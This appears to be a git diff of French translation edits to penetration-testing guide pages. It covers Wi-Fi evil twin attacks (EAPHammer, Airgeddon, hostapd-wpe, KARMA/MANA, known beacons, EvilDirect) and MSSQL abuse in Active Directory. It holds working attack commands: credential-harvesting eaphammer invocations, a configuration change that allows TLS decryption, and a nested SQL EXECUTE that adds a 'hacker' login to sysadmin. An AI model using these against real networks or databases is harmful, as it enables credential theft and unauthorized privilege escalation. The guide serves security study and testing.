Dans le fichier de configuration, vous pouvez sélectionner différentes choses comme le ssid, le canal, les fichiers utilisateur, cret/clé, les paramètres dh, la version wpa et l'auth...
Dans le fichier de configuration, vous pouvez sélectionner différentes choses telles que ssid, canal, fichiers utilisateur, cret/clé, paramètres dh, version wpa et auth...
[**Utilisation de hostapd-wpe avec EAP-TLS pour permettre à n'importe quel certificat de se connecter.**](evil-twin-eap-tls.md)
@ -594,7 +601,7 @@ Dans le fichier de configuration, vous pouvez sélectionner différentes choses
# Launch Attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds
```
Par défaut, EAPHammer propose ces méthodes d'authentification (remarquez que GTC est le premier à essayer pour obtenir les mots de passe en clair, puis l'utilisation de méthodes d'authentification plus robustes) :
Par défaut, EAPHammer propose ces méthodes d'authentification (remarquez que GTC est le premier à essayer d'obtenir des mots de passe en clair, suivi de l'utilisation de méthodes d'authentification plus robustes) :
```
GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5
```
@ -610,7 +617,7 @@ Ou vous pourriez également utiliser :
**Utilisation d'Airgeddon**
`Airgeddon` peut utiliser des certificats générés précédemment pour offrir une authentification EAP aux réseaux WPA/WPA2-Entreprise. Le faux réseau rétrograde le protocole de connexion en EAP-MD5 afin de **capturer l'utilisateur et le MD5 du mot de passe**. Ensuite, l'attaquant peut essayer de craquer le mot de passe.\
`Airgeddon` peut utiliser des certificats générés précédemment pour offrir une authentification EAP aux réseaux WPA/WPA2-Entreprise. Le faux réseau rétrogradera le protocole de connexion en EAP-MD5 afin de **capturer l'utilisateur et le MD5 du mot de passe**. Ensuite, l'attaquant peut essayer de craquer le mot de passe.\
`Airggedon` vous offre la possibilité d'une **attaque Evil Twin continue (bruyante)** ou de **créer uniquement l'attaque Evil jusqu'à ce que quelqu'un se connecte (discrète).**
![](<../../.gitbook/assets/image (129).png>)
@ -622,7 +629,7 @@ _Cette méthode a été testée dans une connexion PEAP mais comme je déchiffre
À l'intérieur de la **configuration** de _hostapd-wpe_, **commentez** la ligne contenant _**dh\_file**_ (de `dh_file=/etc/hostapd-wpe/certs/dh` à `#dh_file=/etc/hostapd-wpe/certs/dh`)\
Cela fera en sorte que `hostapd-wpe` **échange les clés en utilisant RSA** au lieu de DH, vous pourrez donc **déchiffrer** le trafic ultérieurement en **connaissant la clé privée du serveur**.
Maintenant, lancez l'**Evil Twin** en utilisant **`hostapd-wpe`** avec cette configuration modifiée comme d'habitude. Démarrez également **`wireshark`** sur l'**interface** qui effectue l'attaque Evil Twin.
Maintenant, démarrez l'**Evil Twin** en utilisant **`hostapd-wpe`** avec cette configuration modifiée comme d'habitude. Démarrez également **`wireshark`** sur l'**interface** qui effectue l'attaque Evil Twin.
Maintenant ou plus tard (lorsque vous avez déjà capturé quelques tentatives d'authentification), vous pouvez ajouter la clé privée RSA à wireshark dans : `Edit --> Preferences --> Protocols --> TLS --> (RSA keys list) Edit...`
@ -672,7 +679,7 @@ name3
```
### KARMA
Cette méthode permet à un **attaquant de créer un point d'accès (AP) malveillant qui répond à toutes les demandes de sondes** des appareils cherchant à se connecter à des réseaux. Cette technique **trompe les appareils en les incitant à se connecter à l'AP de l'attaquant** en imitant les réseaux recherchés par les appareils. Une fois qu'un appareil envoie une demande de connexion à cet AP frauduleux, la connexion est établie, amenant l'appareil à se connecter par erreur au réseau de l'attaquant.
Cette méthode permet à un **attaquant de créer un point d'accès malveillant (AP) qui répond à toutes les demandes de sondes** des appareils cherchant à se connecter à des réseaux. Cette technique **trompe les appareils en les incitant à se connecter à l'AP de l'attaquant** en imitant les réseaux recherchés par les appareils. Une fois qu'un appareil envoie une demande de connexion à cet AP frauduleux, la connexion est établie, amenant l'appareil à se connecter par erreur au réseau de l'attaquant.
### MANA
@ -684,15 +691,15 @@ L'attaque MANA fonctionne en surveillant à la fois les demandes de sondes dirig
```
### Attaque Loud MANA
Une **attaque Loud MANA** est une stratégie avancée lorsque les appareils n'utilisent pas de sondage dirigé ou lorsque leurs listes de réseaux préférés (PNL) sont inconnues de l'attaquant. Elle repose sur le principe que **les appareils dans la même zone ont probablement des noms de réseau en commun dans leurs PNL**. Au lieu de répondre de manière sélective, cette attaque diffuse des réponses de sondes pour chaque nom de réseau (ESSID) trouvé dans les PNL combinées de tous les appareils observés. Cette approche large augmente la chance qu'un appareil reconnaisse un réseau familier et tente de se connecter au point d'accès (AP) frauduleux.
Une **attaque Loud MANA** est une stratégie avancée pour les cas où les appareils n'utilisent pas de sondage dirigé ou lorsque leurs listes de réseaux préférés (PNL) sont inconnues de l'attaquant. Elle repose sur le principe que **les appareils dans la même zone ont probablement des noms de réseau en commun dans leurs PNL**. Au lieu de répondre de manière sélective, cette attaque diffuse des réponses de sondes pour chaque nom de réseau (ESSID) trouvé dans les PNL combinées de tous les appareils observés. Cette approche large augmente la chance qu'un appareil reconnaisse un réseau familier et tente de se connecter au point d'accès (AP) frauduleux.
```bash
./eaphammer -i wlan0 --cloaking full --mana --loud [--captive-portal] [--auth wpa-psk --creds]
```
### Attaque de balise connue
Lorsque l'attaque **Loud MANA** ne suffit pas, l'**attaque de balise connue** présente une autre approche. Cette méthode **force la connexion en simulant un point d'accès qui répond à tout nom de réseau, en parcourant une liste d'ESSIDs potentiels** dérivés d'une liste de mots. Cela simule la présence de nombreux réseaux, espérant correspondre à un ESSID dans la liste des réseaux préférés de la victime, incitant une tentative de connexion à l'AP fabriqué. L'attaque peut être amplifiée en la combinant avec l'option `--loud` pour une tentative plus agressive d'attirer les appareils.
Lorsque l'attaque **Loud MANA** ne suffit pas, l'**attaque de balise connue** présente une autre approche. Cette méthode **force la connexion en simulant un point d'accès qui répond à tout nom de réseau, en parcourant une liste d'ESSIDs potentiels dérivés d'une liste de mots.** Cela simule la présence de nombreux réseaux, espérant correspondre à un ESSID dans la liste des réseaux préférés de la victime, incitant une tentative de connexion à l'AP fabriqué. L'attaque peut être amplifiée en la combinant avec l'option `--loud` pour une tentative plus agressive d'attirer les appareils.
Eaphammer a mis en œuvre cette attaque en tant qu'attaque MANA où tous les ESSIDs dans une liste sont chargés (vous pourriez également combiner cela avec `--loud` pour créer une attaque Loud MANA + balises connues) :
Eaphammer a implémenté cette attaque en tant qu'attaque MANA où tous les ESSIDs dans une liste sont chargés (vous pouvez également combiner cela avec `--loud` pour créer une attaque Loud MANA + balises connues) :
```bash
./eaphammer -i wlan0 --mana [--loud] --known-beacons --known-ssids-file wordlist.txt [--captive-portal] [--auth wpa-psk --creds]
```
@ -709,18 +716,18 @@ L'**attaque de rafale de balises connue** implique **la diffusion rapide de tram
```
## Wi-Fi Direct
**Wi-Fi Direct** est un protocole permettant aux appareils de se connecter directement les uns aux autres en utilisant le Wi-Fi sans avoir besoin d'un point d'accès sans fil traditionnel. Cette capacité est intégrée à divers appareils de l'Internet des objets (IdO), tels que les imprimantes et les télévisions, facilitant la communication directe entre les appareils. Une caractéristique notable de Wi-Fi Direct est qu'un appareil prend le rôle d'un point d'accès, appelé propriétaire de groupe, pour gérer la connexion.
**Wi-Fi Direct** est un protocole permettant aux appareils de se connecter directement les uns aux autres en utilisant le Wi-Fi sans avoir besoin d'un point d'accès sans fil traditionnel. Cette capacité est intégrée à divers appareils de l'Internet des objets (IdO), tels que les imprimantes et les télévisions, facilitant la communication directe entre les appareils. Une caractéristique notable de Wi-Fi Direct est qu'un appareil prend le rôle d'un point d'accès, appelé le propriétaire du groupe, pour gérer la connexion.
La sécurité des connexions Wi-Fi Direct est établie grâce à la **Configuration protégée Wi-Fi (WPS)**, qui prend en charge plusieurs méthodes d'appariement sécurisé, notamment :
La sécurité des connexions Wi-Fi Direct est établie grâce à **Wi-Fi Protected Setup (WPS)**, qui prend en charge plusieurs méthodes d'appariement sécurisé, notamment :
- **Configuration par bouton-poussoir (PBC)**
- **Saisie de code PIN**
- **Saisie du code PIN**
- **Communication en champ proche (NFC)**
Ces méthodes, en particulier la saisie de code PIN, sont susceptibles aux mêmes vulnérabilités que le WPS dans les réseaux Wi-Fi traditionnels, ce qui en fait des cibles pour des vecteurs d'attaque similaires.
Ces méthodes, en particulier la saisie du code PIN, sont susceptibles aux mêmes vulnérabilités que le WPS dans les réseaux Wi-Fi traditionnels, ce qui en fait des cibles pour des vecteurs d'attaque similaires.
### Détournement EvilDirect
Le **Détournement EvilDirect** est une attaque spécifique au Wi-Fi Direct. Il reflète le concept d'une attaque Evil Twin mais cible les connexions Wi-Fi Direct. Dans ce scénario, un attaquant se fait passer pour un propriétaire de groupe légitime dans le but de tromper les appareils pour qu'ils se connectent à une entité malveillante. Cette méthode peut être exécutée en utilisant des outils comme `airbase-ng` en spécifiant le canal, l'ESSID et l'adresse MAC de l'appareil usurpé :
Le **détournement EvilDirect** est une attaque spécifique au Wi-Fi Direct. Il reflète le concept d'une attaque Evil Twin mais cible les connexions Wi-Fi Direct. Dans ce scénario, un attaquant se fait passer pour un propriétaire de groupe légitime dans le but de tromper les appareils pour qu'ils se connectent à une entité malveillante. Cette méthode peut être exécutée en utilisant des outils comme `airbase-ng` en spécifiant le canal, l'ESSID et l'adresse MAC de l'appareil usurpé :
## Références
@ -745,7 +752,7 @@ Rejoignez le serveur [**HackenProof Discord**](https://discord.com/invite/N3FrSb
Engagez-vous avec du contenu qui explore le frisson et les défis du piratage
**Actualités sur le piratage en temps réel**\
Restez informé du monde du piratage en évolution rapide grâce à des actualités et des informations en temps réel
Restez informé du monde du piratage à rythme rapide grâce à des actualités et des informations en temps réel
**Dernières annonces**\
Restez informé des dernières primes au bug lancées et des mises à jour cruciales de la plateforme

7
windows-hardening/active-directory-methodology/abusing-ad-mssql.md
View file

@ -138,7 +138,8 @@ _Connexion en utilisant l'authentification Windows:_
#### Trouver des liens de confiance
```sql
select * from master..sysservers
select * from master..sysservers;
EXEC sp_linkedservers;
```
![](<../../.gitbook/assets/image (168).png>)
@ -172,8 +173,8 @@ EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT
```
## Élévation locale des privilèges
L'utilisateur local **MSSQL** a généralement un type spécial de privilège appelé **`SeImpersonatePrivilege`**. Cela permet au compte d'**"usurper l'identité d'un client après authentification"**.
L'utilisateur local **MSSQL** a généralement un type de privilège spécial appelé **`SeImpersonatePrivilege`**. Cela permet au compte d'**"usurper l'identité d'un client après l'authentification"**.
Une stratégie à laquelle de nombreux auteurs ont pensé est de forcer un service **SYSTEM** à s'authentifier auprès d'un service malveillant ou de l'homme du milieu que l'attaquant crée. Ce service malveillant peut alors usurper l'identité du service **SYSTEM** pendant qu'il essaie de s'authentifier.
Une stratégie que de nombreux auteurs ont développée consiste à forcer un service **SYSTEM** à s'authentifier auprès d'un service malveillant ou de l'homme du milieu que l'attaquant crée. Ce service malveillant peut alors usurper l'identité du service **SYSTEM** pendant qu'il tente de s'authentifier.
[SweetPotato](https://github.com/CCob/SweetPotato) propose une collection de ces différentes techniques qui peuvent être exécutées via la commande `execute-assembly` de Beacon.